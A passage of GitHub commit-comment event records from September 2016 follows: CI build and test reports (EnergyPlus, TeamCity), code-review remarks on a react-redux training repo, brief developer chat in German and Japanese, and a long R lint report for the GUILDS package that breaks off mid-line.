{"id":"4603524969","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19132894,"position":null,"line":null,"path":null,"commit_id":"559a8b5ada0905037bd2ccef5b46b8eb984d7d41","created_at":"2016-09-22T16:18:37Z","updated_at":"2016-09-22T16:18:37Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2374 of 2375 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-559a8b5ada0905037bd2ccef5b46b8eb984d7d41-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-559a8b5ada0905037bd2ccef5b46b8eb984d7d41-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T16:18:37Z"}
{"id":"4603525794","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19132897,"position":null,"line":null,"path":null,"commit_id":"559a8b5ada0905037bd2ccef5b46b8eb984d7d41","created_at":"2016-09-22T16:18:46Z","updated_at":"2016-09-22T16:18:46Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-559a8b5ada0905037bd2ccef5b46b8eb984d7d41-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T16:18:46Z"}
{"id":"4603526848","type":"CommitCommentEvent","actor":{"login":"gilesbradshaw"},"repo":{"name":"gilesbradshaw/react-redux-training"},"payload":{"comment":{"id":19132901,"position":8,"line":9,"path":"src/app.js","commit_id":"718aa20787750925f6e087e491d4bb91ae6add81","created_at":"2016-09-22T16:18:57Z","updated_at":"2016-09-22T16:18:57Z","body":"having connected our component it gets some new props - these are from the store + action creators.."}},"created_at":"2016-09-22T16:18:57Z"}
{"id":"4603526997","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19132902,"position":null,"line":null,"path":null,"commit_id":"559a8b5ada0905037bd2ccef5b46b8eb984d7d41","created_at":"2016-09-22T16:18:58Z","updated_at":"2016-09-22T16:18:58Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-559a8b5ada0905037bd2ccef5b46b8eb984d7d41-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-559a8b5ada0905037bd2ccef5b46b8eb984d7d41-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-559a8b5ada0905037bd2ccef5b46b8eb984d7d41-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-22T16:18:58Z"}
{"id":"4603528467","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19132912,"position":null,"line":null,"path":null,"commit_id":"559a8b5ada0905037bd2ccef5b46b8eb984d7d41","created_at":"2016-09-22T16:19:11Z","updated_at":"2016-09-22T16:19:11Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-559a8b5ada0905037bd2ccef5b46b8eb984d7d41-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-559a8b5ada0905037bd2ccef5b46b8eb984d7d41-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-559a8b5ada0905037bd2ccef5b46b8eb984d7d41-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-22T16:19:11Z"}
{"id":"4603529302","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19132918,"position":null,"line":null,"path":null,"commit_id":"559a8b5ada0905037bd2ccef5b46b8eb984d7d41","created_at":"2016-09-22T16:19:20Z","updated_at":"2016-09-22T16:19:20Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-559a8b5ada0905037bd2ccef5b46b8eb984d7d41-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T16:19:20Z"}
{"id":"4603530136","type":"CommitCommentEvent","actor":{"login":"ChaosZar"},"repo":{"name":"IncarVishnu/platformer"},"payload":{"comment":{"id":19132923,"position":null,"line":null,"path":null,"commit_id":"d7e3b7affbe296db932b24d92cd4ceef7a588069","created_at":"2016-09-22T16:19:30Z","updated_at":"2016-09-22T16:19:30Z","body":"Moin,\r\n\r\ndas mit dem Soundpool finde ich gut. :D\r\nDann kann man am level hinterlegen, welches stück gespielt werden soll. Ich bin mir bei den Sounds der figur nur nicht ganz sicher. Ich denke es wäre schon angenehm, wenn diese selber bei bestimmte aktionen SOunds abspielen kann, wie z.B. springen.\r\n\r\nDas mit dem wechseln der musik würde ich eventuell über unsichtbare Blöcke machen - wenn man durschreitet wird ein event ausgelöst, welches das nächste stück spielt. Ich gehe davon noch von 2 Spielfeld-layern aus.\r\n\r\nVG\r\n    Alex"}},"created_at":"2016-09-22T16:19:30Z"}
{"id":"4603530375","type":"CommitCommentEvent","actor":{"login":"gilesbradshaw"},"repo":{"name":"gilesbradshaw/react-redux-training"},"payload":{"comment":{"id":19132924,"position":4,"line":5,"path":"src/app.js","commit_id":"718aa20787750925f6e087e491d4bb91ae6add81","created_at":"2016-09-22T16:19:32Z","updated_at":"2016-09-22T16:19:32Z","body":"We are going to use this connector as an HoC to connect our component to the store"}},"created_at":"2016-09-22T16:19:32Z"}
{"id":"4603533073","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19132930,"position":null,"line":null,"path":null,"commit_id":"6a12f47fed9ad9bfc19bc238a0ed1471e879338a","created_at":"2016-09-22T16:19:58Z","updated_at":"2016-09-22T16:19:58Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=79)"}},"created_at":"2016-09-22T16:19:58Z"}
{"id":"4603533087","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19132931,"position":null,"line":null,"path":null,"commit_id":"9d7562cf79f979714904b2f6b80c0e05b2d66acb","created_at":"2016-09-22T16:19:58Z","updated_at":"2016-09-22T16:19:58Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=79)"}},"created_at":"2016-09-22T16:19:58Z"}
{"id":"4603533111","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19132932,"position":null,"line":null,"path":null,"commit_id":"c854f364c45df59dc916829c0961e689f507b98a","created_at":"2016-09-22T16:19:58Z","updated_at":"2016-09-22T16:19:58Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=79)"}},"created_at":"2016-09-22T16:19:58Z"}
{"id":"4603533157","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19132933,"position":null,"line":null,"path":null,"commit_id":"cd115f4e33304fc15e521baaebf8e00eaf7d8401","created_at":"2016-09-22T16:19:59Z","updated_at":"2016-09-22T16:19:59Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=79)"}},"created_at":"2016-09-22T16:19:59Z"}
{"id":"4603533734","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19132935,"position":null,"line":null,"path":null,"commit_id":"e2f80d9b417ca46a7c62bc4c9532d12361e0b930","created_at":"2016-09-22T16:20:05Z","updated_at":"2016-09-22T16:20:05Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1127](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13993&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T16:20:05Z"}
{"id":"4603534791","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19132938,"position":null,"line":null,"path":null,"commit_id":"7a78e4a6a1e6898b3d2e5b65817da156887755a3","created_at":"2016-09-22T16:20:16Z","updated_at":"2016-09-22T16:20:16Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1126](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13989&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:12:03"}},"created_at":"2016-09-22T16:20:16Z"}
{"id":"4603537191","type":"CommitCommentEvent","actor":{"login":"gilesbradshaw"},"repo":{"name":"gilesbradshaw/react-redux-training"},"payload":{"comment":{"id":19132940,"position":13,"line":13,"path":"src/index.js","commit_id":"718aa20787750925f6e087e491d4bb91ae6add81","created_at":"2016-09-22T16:20:40Z","updated_at":"2016-09-22T16:20:40Z","body":"Create a new store combining together all our reducers.."}},"created_at":"2016-09-22T16:20:40Z"}
{"id":"4603539310","type":"CommitCommentEvent","actor":{"login":"gilesbradshaw"},"repo":{"name":"gilesbradshaw/react-redux-training"},"payload":{"comment":{"id":19132946,"position":19,"line":18,"path":"src/index.js","commit_id":"718aa20787750925f6e087e491d4bb91ae6add81","created_at":"2016-09-22T16:21:01Z","updated_at":"2016-09-22T16:21:01Z","body":"The provider provides the store to any connected components"}},"created_at":"2016-09-22T16:21:01Z"}
{"id":"4603543728","type":"CommitCommentEvent","actor":{"login":"PangolinPaw"},"repo":{"name":"PangolinPaw/V.Au.L.T."},"payload":{"comment":{"id":19132955,"position":null,"line":null,"path":null,"commit_id":"0c4ee0bab8d7020728fa947b1fba4f8a26ce4011","created_at":"2016-09-22T16:21:45Z","updated_at":"2016-09-22T16:21:45Z","body":"Fixes #20 "}},"created_at":"2016-09-22T16:21:45Z"}
{"id":"4603551647","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19132972,"position":null,"line":null,"path":null,"commit_id":"4eb006c559041652e8799c9224ec0bdf9f60decb","created_at":"2016-09-22T16:23:08Z","updated_at":"2016-09-22T16:23:08Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 255](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1216&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-22T16:23:08Z"}
{"id":"4603551718","type":"CommitCommentEvent","actor":{"login":"smk7758"},"repo":{"name":"smk7758/JoinLeaveAction"},"payload":{"comment":{"id":19132973,"position":null,"line":null,"path":null,"commit_id":"f86934546df340c4baeb0e9bfdafb360c4288f7b","created_at":"2016-09-22T16:23:09Z","updated_at":"2016-09-22T16:23:09Z","body":"ついでにLoadConfingのやつに説明付けました。"}},"created_at":"2016-09-22T16:23:09Z"}
{"id":"4603559577","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19132985,"position":null,"line":null,"path":null,"commit_id":"b96711968d31cd3261dc47d0d9f2e49381e48f20","created_at":"2016-09-22T16:24:26Z","updated_at":"2016-09-22T16:24:26Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.257.b96711968d31cd3261dc47d0d9f2e49381e48f20](http://build.palaso.org/viewLog.html?buildId=77058&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1289, ignored: 17 Build time: 00:03:15"}},"created_at":"2016-09-22T16:24:26Z"}
{"id":"4603568981","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19132999,"position":null,"line":null,"path":null,"commit_id":"227c27db872cc36f220af7e8e5bc589ca60064ab","created_at":"2016-09-22T16:26:00Z","updated_at":"2016-09-22T16:26:00Z","body":"[R/Condition.R:23:17:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) -\n                ^\n```\n[R/Condition.R:25:9:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L25) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n        ^\n```\n[R/Condition.R:25:43:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                          ^\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L137) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L137) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:140:23:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L140) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  conditional_part <- calc_conditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:146:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L146) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, kda_x, kda_y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:166:9:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L166) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J,\n        ^~~~~~~~~~~~\n```\n[R/Condition.R:170:14:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L170) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  cond_ll <- calc_conditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L175) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L175) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L179) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L179) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L180) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:201:17:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L201) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:209:10:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/Condition.R#L209) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(init_vals, g, verbose)\n         ^~~~~~~\n```\n[R/drawLocal.R:8:19:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      return(-1 * pm_sadaux(x, I, th, j, k))\n                  ^~~~~~~~~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:36:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L10) *style:* **Commas should always have a space after.**\n```r\n​    xmax <- stats::optimize(f, c(0,1))$minimum\n                                   ^\n```\n[R/drawLocal.R:11:13:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    ymax <- pm_sadaux(xmax, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:12:11:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y0 <- pm_sadaux(0, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- 0\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- Inf\n^~\n```\n[R/drawLocal.R:17:16:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​        return(pm_sadaux(x, I, th, j, k) - ymax + 1)\n               ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:22:11:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L22) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y1 <- pm_sadaux(x1, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:23:10:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    while(ymax < (y1 + 1)) {\n         ^\n```\n[R/drawLocal.R:25:13:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      y1 <- pm_sadaux(x1, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:27:19:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n^~~~\n```\n[R/drawLocal.R:28:12:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n^~\n```\n[R/drawLocal.R:31:22:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                    ~^~~\n```\n[R/drawLocal.R:31:60:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                                                          ~^~\n```\n[R/drawLocal.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n^~\n```\n[R/drawLocal.R:32:22:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                    ~^~~\n```\n[R/drawLocal.R:32:30:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                            ~^~\n```\n[R/drawLocal.R:32:35:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                 ~^\n```\n[R/drawLocal.R:32:36:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                   ^\n```\n[R/drawLocal.R:33:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- max(0, 